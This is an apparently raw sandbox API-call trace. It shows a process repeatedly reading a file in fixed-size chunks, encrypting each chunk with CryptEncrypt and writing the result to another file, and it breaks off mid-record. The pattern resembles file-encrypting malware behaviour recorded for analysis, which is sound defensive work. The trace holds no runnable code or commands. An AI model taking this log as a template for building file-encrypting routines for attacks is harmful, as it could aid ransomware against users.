CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.427] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.427] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.429] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.430] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.477] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.477] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.477] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.479] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.602] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 